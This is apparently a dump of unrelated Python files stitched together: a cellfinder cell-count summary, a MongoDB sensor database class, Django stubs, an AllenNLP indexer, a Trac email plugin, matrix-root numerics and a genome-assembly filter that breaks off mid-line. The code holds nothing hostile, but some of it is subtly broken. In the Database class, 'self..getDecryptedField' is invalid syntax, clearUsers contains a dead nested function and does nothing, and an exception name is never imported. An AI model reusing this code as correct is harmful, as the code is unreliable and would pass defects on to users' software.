get_structures_path from neuro.structures.structures_tree import ( atlas_value_to_structure_id, CellCountMissingCellsException, UnknownAtlasValue, ) from neuro.atlas_tools.misc import get_atlas_pixel_sizes from neuro.structures.IO import load_structures_as_df import cellfinder.tools.parser as cellfinder_parse from cellfinder.tools.prep import prep_atlas_conf, Paths LEFT_HEMISPHERE = 2 RIGHT_HEMISPHERE = 1 def region_summary_cli_parser(): parser = argparse.ArgumentParser( formatter_class=argparse.ArgumentDefaultsHelpFormatter ) parser = cli_parse(parser) parser = cellfinder_parse.count_summary_parse(parser) parser = cellfinder_parse.pixel_parser(parser) return parser def cli_parse(parser): cli_parser = parser.add_argument_group("Input data options") cli_parser.add_argument( "--registered-atlas", dest="registered_atlas_path", type=str, help="The path to the atlas registered to the sample brain", ) cli_parser.add_argument( "--hemispheres", dest="hemispheres_atlas_path", type=str, help="The atlas with just the 
hemispheres encoded.", ) cli_parser.add_argument( "--xml", dest="xml_file_path", type=str, help="The xml file containing the cell locations", ) cli_parser.add_argument( "-o", "--output-dir", dest="output_dir", type=str, required=True, help="Output directory for all intermediate and final results.", ) return parser def get_cells_data(xml_file_path, cells_only=True): cells = get_cells(xml_file_path, cells_only=cells_only) if not cells: raise CellCountMissingCellsException( "No cells found in file: {}".format(xml_file_path) ) return cells def get_scales(sample_pixel_sizes, atlas_pixel_sizes, scale=True): if scale: sample_x, sample_y, sample_z = sample_pixel_sizes atlas_x_pix_size = atlas_pixel_sizes["x"] atlas_y_pix_size = atlas_pixel_sizes["y"] atlas_z_pix_size = atlas_pixel_sizes["z"] x_scale = float(sample_x) / float(atlas_x_pix_size) y_scale = float(sample_y) / float(atlas_y_pix_size) z_scale = float(sample_z) / float(atlas_z_pix_size) return x_scale, y_scale, z_scale else: return 1, 1, 1 def get_atlas_pixel_sizes(atlas_config_path): config_obj = get_config_obj(atlas_config_path) atlas_conf = config_obj["atlas"] atlas_pixel_sizes = atlas_conf["pixel_size"] return atlas_pixel_sizes def get_max_coords(cells): max_x, max_y, max_z = (0, 0, 0) for cell in cells: if cell.x > max_x: max_x = cell.x if cell.y > max_y: max_y = cell.y if cell.z > max_z: max_z = cell.z return max_x, max_y, max_z def transform_cell_coords(atlas, cell, scales): x_scale, y_scale, z_scale = scales # convert to atlas coordinates cell.soft_transform(x_scale, y_scale, z_scale, integer=True) # In case we reorientated the sample, not the atlas. flip_dims = False # FIXME: put CLI option if flip_dims: cell.transformed_y, cell.transformed_z = ( cell.transformed_z, cell.transformed_y, ) # TODO: do in cell # TEST: check that correct dim to flip cell.transformed_z = atlas.shape[2] - cell.transformed_z def get_cells_nbs_df(cells, structures_reference_df, structures_with_cells): structures_with_cells = list(structures_with_cells) cell_numbers = pd.DataFrame( columns=("structure_name", "hemisphere", "cell_count") ) for structure in structures_with_cells: for hemisphere in (1, 2): n_cells = len( [ c for c in cells if c.structure_id == structure and c.hemisphere == hemisphere ] ) if n_cells: struct_name = structures_reference_df[ structures_reference_df["structure_id_path"] == structure ]["name"].values[0] cell_numbers = cell_numbers.append( { "structure_name": struct_name, "hemisphere": hemisphere, "cell_count": n_cells, }, ignore_index=True, ) sorted_cell_numbers = cell_numbers.sort_values( by=["cell_count"], ascending=False ) return sorted_cell_numbers def get_structure_from_coordinates( atlas, cell, max_coords, order=(0, 1, 2), structures_reference_df=None ): transformed_coords = ( cell.transformed_x, cell.transformed_y, cell.transformed_z, ) try: atlas_value = atlas[ transformed_coords[order[0]], transformed_coords[order[1]], transformed_coords[order[2]], ] except IndexError as err: logging.warning( "The cell {}, scaled to {} " "falls outside of the atlas with " "dimensions {}. 
Treating as outside the brain".format( cell, transformed_coords, atlas.shape, max_coords, err ) ) return 0 if structures_reference_df is None: return atlas_value else: try: structure_id = atlas_value_to_structure_id( atlas_value, structures_reference_df ) except UnknownAtlasValue as err: print( "Skipping cell {} (scaled: {}), missing value {}".format( cell, transformed_coords, err ) ) return else: return structure_id def analysis_run(args, file_name="summary_cell_counts.csv"): args = prep_atlas_conf(args) atlas = brainio.load_any(args.paths.registered_atlas_path) hemisphere = brainio.load_any(args.paths.hemispheres_atlas_path) cells = get_cells_data( args.paths.classification_out_file, cells_only=args.cells_only, ) max_coords = get_max_coords(cells) # Useful for debugging dimensions structures_reference_df = load_structures_as_df(get_structures_path()) atlas_pixel_sizes = get_atlas_pixel_sizes(args.atlas_config) sample_pixel_sizes = args.x_pixel_um, args.y_pixel_um, args.z_pixel_um scales = get_scales( sample_pixel_sizes, atlas_pixel_sizes, args.scale_cell_coordinates ) structures_with_cells = set() for i, cell in enumerate(tqdm(cells)): transform_cell_coords(atlas, cell, scales) structure_id = get_structure_from_coordinates( atlas, cell, max_coords, order=args.coordinates_order, structures_reference_df=structures_reference_df, ) if structure_id is not None: cell.structure_id = structure_id structures_with_cells.add(structure_id) else: continue cell.hemisphere = get_structure_from_coordinates( hemisphere, cell, max_coords, order=args.coordinates_order ) sorted_cell_numbers = get_cells_nbs_df( cells, structures_reference_df, structures_with_cells ) combined_hemispheres = combine_df_hemispheres(sorted_cell_numbers) df = calculate_densities(combined_hemispheres, args.paths.volume_csv_path) df = sanitise_df(df) if not os.path.exists(args.output_dir): os.makedirs(args.output_dir) output_file = os.path.join(args.output_dir, file_name) df.to_csv(output_file, index=False) def calculate_densities(counts, volume_csv_path): """ Use the region volume information from registration to calculate cell densities. Based on the atlas names, which must be exactly equal. 
:param counts: dataframe with cell counts :param volume_csv_path: path of the volumes of each brain region :return: """ volumes = pd.read_csv(volume_csv_path, sep=",", header=0, quotechar='"') df = pd.merge(counts, volumes, on="structure_name", how="outer") df = df.fillna(0) df["left_cells_per_mm3"] = df.left_cell_count / df.left_volume_mm3 df["right_cells_per_mm3"] = df.right_cell_count / df.right_volume_mm3 return df def combine_df_hemispheres(df): """ Combine left and right hemisphere data onto a single row :param df: :return: """ left = df[df["hemisphere"] == LEFT_HEMISPHERE] right = df[df["hemisphere"] == RIGHT_HEMISPHERE] left = left.drop(["hemisphere"], axis=1) right = right.drop(["hemisphere"], axis=1) left.rename(columns={"cell_count": "left_cell_count"}, inplace=True) right.rename(columns={"cell_count": "right_cell_count"}, inplace=True) both = pd.merge(left, right, on="structure_name", how="outer") both = both.fillna(0) both["total_cells"] = both.left_cell_count + both.right_cell_count both = both.sort_values("total_cells", ascending=False) return both def main(): args = region_summary_cli_parser().parse_args() args = define_pixel_sizes(args) args.paths = Paths(args, args.output_dir) args.paths.registered_atlas_path = args.registered_atlas_path args.paths.hemispheres_atlas_path = args.hemispheres_atlas_path args.paths.classification_out_file = args.xml_file_path analysis_run(args) if __name__ == "__main__": main() home-suite-home/Home-Suite-Home # # Database.py import sys sys.path.append("..") import pymongo as mongo from timeKeeper import TimeStamps from Server_Component.Security import Security URL = 'localhost' PORT = 27017 # This class will be comprised of methods that will # interface with a MongoDB database. These methods should # expect values from the methods in Sensors.py, and # send them to the database as JSON payloads. class Database: def __init__(self, url = URL, port = PORT): self.url = url self.port = port self.connect_status = False try: self.client = mongo.MongoClient(self.url, self.port) self.connect_status = True except Exception as e: print("Well that didn't work. Check the database address, and make sure the mongod process is running...") else: self.client = mongo.MongoClient() self.secure = Security(self.client) self.secure.setup() def connect(self): if self.connect_status == False: try: self.client = mongo.MongoClient(self.url, self.port) self.connect_status = True except ConnectionFailure: print("Well that didn't work. Check the database address, and make sure the mongod process is running...") self.connect_status = False else: print("connection already established") # Populates the database with a single recod given its name, sensor type, and raw value. def sendSensorData(self, data, name, sensor_type): if self.connect_status == True: db = self.client['sensorsdb'] collection = db['sensors'] # ceate indexes to speed up common queries collection.create_index([("name", -1), ("type" , 1)]) collection.create_index([("name", -1), ("type" , 1), ("time" , -1)]) ts = TimeStamps().getTimestamp() dataobj = { "type": sensor_type, "name": name, "value": data, "time": ts } collection.insert_one(dataobj) else: print("Well that didn't work. 
Check the database address, and make sure the mongod process is running...") self.connect() # Retrieves all values currently in the database def getData(self): if self.connect_status == True: db = self.client['sensorsdb'] collection = db['sensors'] records = collection.find({}, {'_id' : 0}) report_list = [] for record in records: report_list.append(record) return report_list else: print("Well that didn't work. Check the database address, and make sure the mongod process is running...") self.connect() return [] # Produces the average value of a sensor in a time period def getAvgVal(self, name, sensor_type): if self.connect_status == True: db = self.client['sensorsdb'] collection = db['sensors'] records = collection.find({'name' : name, 'type' : sensor_type}, {'_id' : 0, 'time' : 0, 'type' : 0, 'name' : 0}) total = 0 num = 0 for record in records: total += record['value'] num += 1 try: sensor_avg = total / num except Exception as e: sensor_avg = 0 return sensor_avg else: print("Well that didn't work. Check the database address, and make sure the mongod process is running...") self.connect() return 0 # Saves/ Updates sensor config data def saveConfigData(self, sensor_type, name, category, address, port, sub_address, min_threshold, max_threshold, units, alerts): if self.connect_status == True: db = self.client['sensorsdb'] collection = db['config'] dataobj = { "type": sensor_type, "name": name, "category": category, "address": address, "port": port, "sub_address": sub_address, "min_threshold" : min_threshold, "max_threshold" : max_threshold, "units" : units, "alerts": alerts } # First, check if there's a record for this sensor... if collection.count_documents({'name' : name, 'type' : sensor_type}) >= 1: # ... and update if there's an existing record collection.update_one({'name' : name, 'type' : sensor_type}, {'$set' :dataobj}) else: # Otherwise, insert the record collection.insert_one(dataobj) else: print("Well that didn't work. Check the database address, and make sure the mongod process is running...") self.connect() # Recieves old document (given by getSensorConfig or a dict) as well as the fields of the updated records # And supplants them in the old record def editConfigData(self, doc, sensor_type, name, category, address, port, sub_address, min_threshold, max_threshold, units, alerts): if self.connect_status == True: db = self.client['sensorsdb'] collection = db['config'] sensor_collection = db['sensors'] # Enforce unique name-type pairs collection.create_index([("name", -1), ("type" , 1)], unique = True) dataobj = { "type": sensor_type, "name": name, "category": category, "address": address, "port": port, "sub_address": sub_address, "min_threshold" : min_threshold, "max_threshold" : max_threshold, "units" : units, "alerts": alerts } try: # LOL big fix for historical sensor data if doc["name"] != name: collection.update_one(doc, {'$set' : dataobj}) sensor_collection.update_many({"name" : doc["name"]} , {'$set' : {'name' : name}}) else: collection.update_one(doc, {'$set' : dataobj}) except Exception as e: print("Error in db: ", e) print("Entry already exists.") else: print("Well that didn't work. 
Check the database address, and make sure the mongod process is running...") self.connect() # retrieves a sensor's data in the database within a range of hours def getRecentSensorData(self, name, sensor_type, hours): if self.connect_status == True: db = self.client['sensorsdb'] collection = db['sensors'] # All records will have a ts value greater than this time_bound = (TimeStamps().getTimestamp()) - (3600 * hours) records = collection.find({'name' : name, 'type' : sensor_type, 'time': {'$gte': time_bound}}, {'_id' : 0}).sort("time", -1) report_list = [] for record in records: report_list.append(record) return report_list else: print("Well that didn't work. Check the database address, and make sure the mongod process is running...") self.connect() return [] # Returns the most recent value for a given sensor def getMostRecentSensorData(self, name, sensor_type): if self.connect_status == True: db = self.client['sensorsdb'] collection = db['sensors'] record = collection.find_one({'name': name, 'type' : sensor_type }, sort = [('time', -1)]) if record is None or str(record['value']) == 'nan': return 'NaN' return record['value'] else: print("Well that didn't work. Check the database address, and make sure the mongod process is running...") self.connect() return 0 # Returns minimum value of a sensor in a certain time frame def getRecentMax(self, name, sensor_type, hours): if self.connect_status == True: db = self.client['sensorsdb'] collection = db['sensors'] # All records will have a ts value greater than this time_bound = (TimeStamps().getTimestamp()) - (3600 * hours) record = collection.find_one({'name': name, 'type' : sensor_type, 'time' : { '$gte' : time_bound }}, sort = [('value', -1)]) if record is None or str(record['value']) == 'nan': return 'NaN' return record['value'] else: print("Well that didn't work. Check the database address, and make sure the mongod process is running...") self.connect() return 0 # Returns minimum value of a sensor in a certain time frame def getRecentMin(self, name, sensor_type, hours): if self.connect_status == True: db = self.client['sensorsdb'] collection = db['sensors'] # All records will have a ts value greater than this time_bound = (TimeStamps().getTimestamp()) - (3600 * hours) record = collection.find_one({'name': name, 'type' : sensor_type,'time' : { '$gte' : time_bound }}, sort = [('value', 1)]) if record is None or str(record['value']) == 'nan': return 'NaN' return record['value'] else: print("Well that didn't work. Check the database address, and make sure the mongod process is running...") self.connect() return 0 # Retrieves config doc for a sensor def getSensorConfig(self, name, sensor_type): if self.connect_status == True: db = self.client['sensorsdb'] collection = db['config'] record = collection.find_one({"name" : name, "type" : sensor_type}) return record else: print("Well that didn't work. Check the database address, and make sure the mongod process is running...") self.connect() return None # retrieves all config data def getConfigData(self): if self.connect_status == True: db = self.client['sensorsdb'] collection = db['config'] records = collection.find({}, {'_id' : 0}) report_list = [] for record in records: report_list.append(record) return report_list else: print("Well that didn't work. 
Check the database address, and make sure the mongod process is running...") self.connect() return [] # returns an array of field tyes def getFields(self, field): if self.connect_status == True: db = self.client['sensorsdb'] collection = db['config'] records = collection.find({}, {'_id' : 0}).distinct(field) report_list = [] for record in records: report_list.append(record) return report_list else: print("Well that didn't work. Check the database address, and make sure the mongod process is running...") self.connect() return [] # Add encryption: Saves pi credentials def saveCredentials(self, email, password): if self.connect_status == True: db = self.client['sensorsdb'] collection = db['creds'] crypt = self.client['encryption']['__homeSuiteKeyVault'] crypt.drop() dataobj = { "email": email, "password" : self.secure.getEncryptedField(password, 1) } # First, check if there's a record for this sensor... if collection.count_documents({}) >= 1: # ... and update if there's an existing record collection.replace_one({}, dataobj) else: # Otherwise, insert the record collection.insert_one(dataobj) else: print("Well that didn't work. Check the database address, and make sure the mongod process is running...") self.connect() def getCredentials(self): if self.connect_status == True: db = self.client['sensorsdb'] collection = db['creds'] record = collection.find_one({}, {'_id' : 0}) if not record: return None password = record['password'] record['password'] = self..getDecryptedField(password) return record else: print("Well that didn't work. Check the database address, and make sure the mongod process is running...") self.connect() return None # Saves user info to users collection. def saveUser(self, name, email): if self.connect_status == True: db = self.client['sensorsdb'] collection = db['users'] dataobj = { "name" : name, "email": email } # First, check if there's a record for this sensor... if collection.count_documents({'email' : email}) >= 1: # ... and update if there's an existing record collection.replace_one({'email' : email}, dataobj) else: # Otherwise, insert the record collection.insert_one(dataobj) else: print("Well that didn't work. Check the database address, and make sure the mongod process is running...") self.connect() # returns dict of user doc comprised of name and email def getUser(self, email): if self.connect_status == True: db = self.client['sensorsdb'] collection = db['users'] record = collection.find_one({"email" : email}) return record else: print("Well that didn't work. Check the database address, and make sure the mongod process is running...") self.connect() return None def getAllUsers(self): if self.connect_status == True: db = self.client['sensorsdb'] collection = db['users'] records = collection.find({}, {'_id' : 0}) report_list = [] for record in records: report_list.append(record) return report_list else: print("Well that didn't work. Check the database address, and make sure the mongod process is running...") self.connect() return [] def deleteUser(self, email): if self.connect_status == True: db = self.client['sensorsdb'] collection = db['users'] collection.delete_one({ "email" : email}) else: print("Well that didn't work. Check the database address, and make sure the mongod process is running...") self.connect() def clearUsers(self): def deleteUser(self, email): if self.connect_status == True: db = self.client['sensorsdb'] collection = db['users'] collection.delete_many({}) else: print("Well that didn't work. 
Check the database address, and make sure the mongod process is running...") self.connect() # Saves an entry in alert logs def saveLog(self, name, sensor_type): if self.connect_status == True: db = self.client['sensorsdb'] collection = db['logs'] ts = TimeStamps().getTimestamp() dataobj = { "type": sensor_type, "name": name, "time": ts } collection.insert_one(dataobj) else: print("Well that didn't work. Check the database address, and make sure the mongod process is running...") self.connect() # returns True if an alert has already been sent in the user-defined # time frame, and False otherwise def alertSent(self, name, sensor_type, minutes): if self.connect_status == True: db = self.client['sensorsdb'] collection = db['logs'] time_bound = (TimeStamps().getTimestamp()) - (60 * minutes) filter = { 'name': name, 'type' : sensor_type, 'time' : {'$gte' : time_bound} } if collection.count_documents(filter) >= 1: return True else: return False else: print("Well that didn't work. Check the database address, and make sure the mongod process is running...") self.connect() return True # clears alert log def clearLog(self): if self.connect_status == True: db = self.client['sensorsdb'] collection = db['logs'] collection.delete_many({}) else: print("Well that didn't work. Check the database address, and make sure the mongod process is running...") self.connect() # removes a named sensor's config file def deleteConfigData(self, name, sensor_type): if self.connect_status == True: db = self.client['sensorsdb'] collection = db['config'] collection.delete_one({"name" : name, "type" : sensor_type}) print("deleting " + name + " : " + sensor_type + " ...") else: print("Well that didn't work. Check the database address, and make sure the mongod process is running...") self.connect() # Deletes all config data def clearConfigData(self): if self.connect_status == True: db = self.client['sensorsdb'] collection = db['config'] collection.delete_many({}) else: print("Well that didn't work. Check the database address, and make sure the mongod process is running...") self.connect() # Deletes all records in the database def clear(self): if self.connect_status == True: db = self.client['sensorsdb'] collection = db['sensors'] collection.delete_many({}) else: print("Well that didn't work. 
Check the database address, and make sure the mongod process is running...") self.connect() from django.apps import AppConfig class MakananConfig(AppConfig): name = 'modules.classifier' from typing import Dict, List import itertools import numpy as np import json from overrides import overrides from allennlp.common.util import pad_sequence_to_length from allennlp.data.vocabulary import Vocabulary from allennlp.data.tokenizers.token import Token from allennlp.data.token_indexers.token_indexer import TokenIndexer @TokenIndexer.register("baidu-indexer") class SingleIdTokenIndexer(TokenIndexer[int]): def __init__(self, namespace: str = 'tokens', lowercase_tokens: bool = False ) -> None: self.namespace = namespace self.lowercase_tokens = lowercase_tokens self.w2i, self.emb_val = self.load_word_emb() @overrides def count_vocab_items(self, token: Token, counter: Dict[str, Dict[str, int]]): #donothing pass @overrides def tokens_to_indices(self, tokens: List[Token], vocabulary: Vocabulary, index_name: str) -> Dict[str, List[int]]: indices: List[int] = [] for token in tokens: text = token.text if self.lowercase_tokens: text = text.lower() indices.append(self.w2i[text]) return {index_name: indices} @overrides def get_padding_token(self) -> int: return 0 @overrides def get_padding_lengths(self, token: int) -> Dict[str, int]: # pylint: disable=unused-argument return {} @overrides def pad_token_sequence(self, tokens: Dict[str, List[int]], desired_num_tokens: Dict[str, int], padding_lengths: Dict[str, int]) -> Dict[str, List[int]]: # pylint: disable=unused-argument return {key: pad_sequence_to_length(val, desired_num_tokens[key]) for key, val in tokens.items()} def load_word_emb(self): with open('baidu/word2idx.json', encoding='UTF-8') as inf: w2i = json.load(inf) with open('baidu/usedwordemb.npy', "rb") as inf: word_emb_val = np.load(inf) return w2i, word_emb_val from boucanpy.core.base.repos import BaseRepo from boucanpy.db.models.black_listed_token import BlackListedToken from boucanpy.core.black_listed_token.data import BlackListedTokenData class BlackListedTokenRepo(BaseRepo): default_model = BlackListedToken default_data_model = BlackListedTokenData stat-kwon/notificationsrc/spaceone/notification/manager/identity_manager.py import logging from spaceone.core.manager import BaseManager from spaceone.core.connector.space_connector import SpaceConnector _LOGGER = logging.getLogger(__name__) class IdentityManager(BaseManager): def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) self.identity_connector: SpaceConnector = self.locator.get_connector('SpaceConnector', service='identity') def get_user(self, user_id, domain_id): return self.identity_connector.dispatch('User.get', {'user_id': user_id, 'domain_id': domain_id}) def get_project(self, project_id, domain_id): return self.identity_connector.dispatch('Project.get', {'project_id': project_id, 'domain_id': domain_id}) def get_service_account(self, service_account_id, domain_id): return self.identity_connector.dispatch('ServiceAccount.get', {'service_account_id': service_account_id, 'domain_id': domain_id}) 10-100 # Generated by Django 2.2.10 on 2020-05-20 20:31 from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ('profile', '0036_auto_20200508_0751'), ('datasets', '0092_auto_20200520_1048'), ] operations = [ migrations.AddField( model_name='dataset', name='profile', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, 
to='profile.Profile'), ) ] examples/phobos/tests/test_std_typecons.py def test_import(): import std_typecons ladaegorova18/CalculationMethods from numpy.linalg import eig, inv, norm, cond import numpy as np from tabulate import tabulate def genVandermonde(n): result = np.zeros(shape=(n, n)) for i in range(n): for k in range(n): result[i, k] = (i + 1) ** ((n + 1 - (k + 1)) ** (-4)) return result def newton(X, epsilon): x_k = np.identity(X.shape[0]) x_k1 = 0.5 * (x_k + inv(x_k) @ X) while norm(x_k1 - x_k) > epsilon: x_k = x_k1 x_k1 = 0.5 * (x_k + inv(x_k) @ X) return x_k1 def eigMethod(X): V = eig(X)[1] sigma = np.diag(eig(X)[0]**(0.5)) return V @ sigma @ inv(V) def toFixed(numObj, digits=0): return f"{numObj:.{digits}f}" Cond = [] for i in range(2, 16): X = genVandermonde(i) eigRoot = eigMethod(X) if i in range(2, 8): newtonRoot = newton(X, 1e-3 * (i ** 2)) else: newtonRoot = newton(X, 1e-2 * (i ** 2)) Cond.append([i, toFixed(cond(X), 8), toFixed(cond(newtonRoot), 8), toFixed(cond(eigRoot), 8), toFixed(norm(newtonRoot @ newtonRoot - X), 8), toFixed(norm(eigRoot @ eigRoot - X), 8)]) print(tabulate(Cond, headers=['n', 'cond (A)', 'cond (B) (Newton)', 'cond (B) (Eig)', 'norm (B^2 - A) (newton)', 'norm (B^2 - A) (eig)'], tablefmt='pipe', numalign="right")) X = genVandermonde(3) print(X) root = eigMethod(X) print(root) print(root @ root)isabella232/TracPortalPlugintracportalopt/project/notification.py #! -*- coding: utf-8 -*- # # (C) 2013 Internet Initiative Japan Inc. # All rights reserved. # # Created on 2013/05/15 # @author: """Notify project owner with email when the project created successfully.""" from pkg_resources import resource_filename from trac.config import Option, ListOption from trac.core import Component, implements from trac.notification import Notify, NotifyEmail from trac.web.chrome import ITemplateProvider from tracportal.i18n import _ from tracportal.project.api import IProjectCreationInterceptor class ProjectCreationNotificationSystem(Component): implements(ITemplateProvider, IProjectCreationInterceptor) # options from_name = Option('tracportal', 'notify_email_from_name', doc=_('Sender name to use in notification emails.')) from_email = Option('tracportal', 'notify_email_from', doc=_('Sender address to use in notification emails.')) ccrcpts = ListOption('tracportal', 'notify_email_cc', doc=_('Email address(es) to always send notifications to, ' 'addresses can be seen by all recipients (Cc:).')) subject = Option('tracportal', 'notify_email_subject', default=_("Ready to start Trac project!"), doc=_('Subject in notification emails.')) # ITemplateProvider methods def get_templates_dirs(self): return [resource_filename(__name__, 'templates')] def get_htdocs_dirs(self): return [] # IProjectCreationInterceptor methods def pre_process(self, project_info, owner_info): pass def post_process(self, project_info, owner_info, env): if 'email' in owner_info: project_info['url'] = env.abs_href() support = { 'name': self.from_name or self.env.project_name, 'email': self.from_email or self.env.config.get('notification', 'smtp_from'), } notify_email = ProjectCreationNotifyEmail(self.env, (owner_info['email'],), tuple(self.ccrcpts), project_info, owner_info, support) notify_email.notify('') class ProjectCreationNotifyEmail(NotifyEmail): """Notification of a project creation.""" template_name = 'project_creation_notify_email.txt' def __init__(self, env, torcpts, ccrcpts, project_info, owner_info, support): NotifyEmail.__init__(self, env) self.torcpts = torcpts self.ccrcpts = ccrcpts 
self.project_info = project_info self.owner_info = owner_info self.support = support self.subject = self.subject def get_recipients(self, resid): return (self.torcpts, self.ccrcpts,) def notify(self, resid, subject=None, author=None): if subject: self.subject = subject self.from_name = self.support['name'] self.from_email = self.support['email'] self.replyto_email = self.support['email'] if self.data is None: self.data = {} self.data.update({ 'owner': self.owner_info, 'project': self.project_info, 'support': self.support, }) Notify.notify(self, resid) 0 t = int(input()) score_dict = dict([]) score_dict[0] = 1 score_dict[1] = 1 score_dict[2] = 2 def get_score(n): if n in score_dict: return score_dict[n] else: sum_n_3 = 0 for i in range(n-2): sum_n_3 += get_score(i) ret = 1 + get_score(n-2) + 2 * sum_n_3 # Same as 1 + sum_n_2 + sum_n_3 score_dict[n] = ret return ret inp_list = [] for i in range(t): inp_list.append(int(input())) for n in inp_list: print(get_score(n))gamcil/AAFTF import sys, os, shutil from subprocess import call, Popen, PIPE, STDOUT import subprocess from Bio import SeqIO from AAFTF.utility import execute from AAFTF.utility import calcN50 from AAFTF.utility import fastastats from AAFTF.resources import DB_Links from AAFTF.utility import status from AAFTF.utility import printCMD from AAFTF.utility import SafeRemove from AAFTF.utility import checkfile # logging - we may need to think about whether this has # separate name for the different runfolder def run(parser,args): if not args.workdir: args.workdir = 'aaftf-sourpurge_'+str(os.getpid()) if not os.path.exists(args.workdir): os.mkdir(args.workdir) bamthreads = 4 if args.cpus < 4: bamthreads = 1 #find reads forReads, revReads = (None,)*2 if args.left: forReads = os.path.abspath(args.left) if args.right: revReads = os.path.abspath(args.right) if not forReads: status('Unable to located FASTQ raw reads, low coverage will be skipped. 
Provide -l,--left or -r,--right to enable low coverage filtering.') # sys.exit(1) #parse database locations if not args.sourdb: try: DB = os.environ["AAFTF_DB"] except KeyError: if args.AAFTF_DB: SOUR = os.path.join(args.AAFTF_DB, 'genbank-k31.lca.json.gz') else: status("$AAFTF_DB/genbank-k31.lca.json.gz not found, pass --sourdb") sys.exit(1) SOUR = os.path.join(DB, 'genbank-k31.lca.json.gz') if not os.path.isfile(SOUR): status("{:} sourmash database not found".format(SOUR)) # should we prompt it to download sys.exit(1) else: SOUR = os.path.abspath(args.sourdb) # hard coded tmpfile assembly_working = 'assembly.fasta' megablast_working = 'megablast.out' blobBAM = 'remapped.bam' shutil.copyfile(args.input, os.path.join(args.workdir,assembly_working)) numSeqs, assemblySize = fastastats(os.path.join(args.workdir, assembly_working)) status('Assembly is {:,} contigs and {:,} bp'.format(numSeqs, assemblySize)) DEVNULL = open(os.devnull, 'w') #now filter for taxonomy with sourmash lca classify status('Running SourMash to get taxonomy classification for each contig') sour_sketch = os.path.basename(assembly_working)+'.sig' sour_compute = ['sourmash', 'compute', '-k', '31', '--scaled=1000', '--singleton', assembly_working] printCMD(sour_compute) subprocess.run(sour_compute, cwd=args.workdir, stderr=DEVNULL) sour_classify = ['sourmash', 'lca', 'classify', '--db', SOUR,'--query', sour_sketch] printCMD(sour_classify) # output csv: ID,status,superkingdom,phylum,class,order,family,genus,species,strain Taxonomy = {} UniqueTax = [] sourmashTSV = os.path.join(args.workdir, 'sourmash.csv') with open(sourmashTSV, 'w') as sour_out: for line in execute(sour_classify, args.workdir): sour_out.write(line) if not line or line.startswith('\n') or line.startswith('ID') or line.count(',') < 9: continue line = line.strip() cols = line.split(',') if 'found' in cols: idx = cols.index('found') Taxonomy[cols[0]] = cols[idx+1:] taxClean = [x for x in cols[idx+1:] if x] UniqueTax.append('{:}'.format(';'.join(taxClean))) elif 'nomatch' in cols: idx = cols.index('nomatch') Taxonomy[cols[0]] = cols[idx+1:] UniqueTax = set(UniqueTax) status('Found {:} taxonomic classifications for contigs:\n{:}'. 
format(len(UniqueTax), '\n'.join(UniqueTax))) if args.taxonomy: sys.exit(1) Tax2Drop = [] for k,v in Taxonomy.items(): v = [x for x in v if x] #remove empty items from list if args.debug: print('{:}\t{:}'.format(k, v)) if len(v) > 0: if not any(i in v for i in args.phylum): Tax2Drop.append(k) #drop contigs from taxonomy before calculating coverage status('Dropping {:} contigs from taxonomy screen'.format(len(Tax2Drop))) sourTax = os.path.join(args.workdir, 'sourmashed-tax-screen.fasta') with open(sourTax, 'w') as outfile: with open(os.path.join(args.workdir,assembly_working), 'rU') as infile: for record in SeqIO.parse(infile, 'fasta'): if not record.id in Tax2Drop: SeqIO.write(record, outfile, 'fasta') # only do coverage trimming if reads provided Contigs2Drop = [] # this will be empty if no reads given to gather by coverage if forReads: #check if BAM present, if so skip running if not os.path.isfile(os.path.join(args.workdir, blobBAM)): # index bwa_index = ['bwa','index', os.path.basename(sourTax)] status('Building BWA index') printCMD(bwa_index) subprocess.run(bwa_index, cwd=args.workdir, stderr=DEVNULL) #mapped reads to assembly using BWA bwa_cmd = ['bwa','mem', '-t', str(args.cpus), os.path.basename(sourTax), # assembly index base forReads] if revReads: bwa_cmd.append(revReads) #run BWA and pipe to samtools sort status('Aligning reads to assembly with BWA') printCMD(bwa_cmd) p1 = subprocess.Popen(bwa_cmd, cwd=args.workdir, stdout=subprocess.PIPE, stderr=DEVNULL) p2 = subprocess.Popen(['samtools', 'sort', '--threads', str(bamthreads), '-o', blobBAM, '-'], cwd=args.workdir, stdout=subprocess.PIPE, stderr=DEVNULL, stdin=p1.stdout) p1.stdout.close() p2.communicate() subprocess.run(['samtools', 'index', blobBAM], cwd=args.workdir) #now calculate coverage from BAM file status('Calculating read coverage per contig') FastaBed = os.path.join(args.workdir, 'assembly.bed') lengths = [] with open(FastaBed, 'w') as bedout: with open(sourTax, 'rU') as SeqIn: for record in SeqIO.parse(SeqIn, 'fasta'): bedout.write('{:}\t{:}\t{:}\n'.format(record.id, 0, len(record.seq))) lengths.append(len(record.seq)) N50 = calcN50(lengths) Coverage = {} coverageBed = os.path.join(args.workdir, 'coverage.bed') cov_cmd = ['samtools', 'bedcov', os.path.basename(FastaBed), blobBAM] printCMD(cov_cmd) with open(coverageBed, 'w') as bed_out: for line in execute(cov_cmd, args.workdir): bed_out.write(line) if not line or line.startswith('\n') or line.count('\t') < 3: continue line = line.strip() cols = line.split('\t') cov = int(cols[3]) / float(cols[2]) Coverage[cols[0]] = (int(cols[2]), cov) #get average coverage of N50 contigs n50Cov = [] for k,v in Coverage.items(): if args.debug: print('{:}; Len: {:}; Cov: {:.2f}'.format(k, v[0], v[1])) if v[0] >= N50: n50Cov.append(v[1]) n50AvgCov = sum(n50Cov) / len(n50Cov) minpct = args.mincovpct / 100 # should we make this a variable? 5% was something arbitrary min_coverage = float(n50AvgCov * minpct) status('Average coverage for N50 contigs is {:}X'.format(int(n50AvgCov))) #Start list of contigs to drop for k,v in Coverage.items(): if v[1] <= min_coverage: Contigs2Drop.append(k) status('Found {:,} contigs with coverage less than {:.2f}X ({:}%)'. 
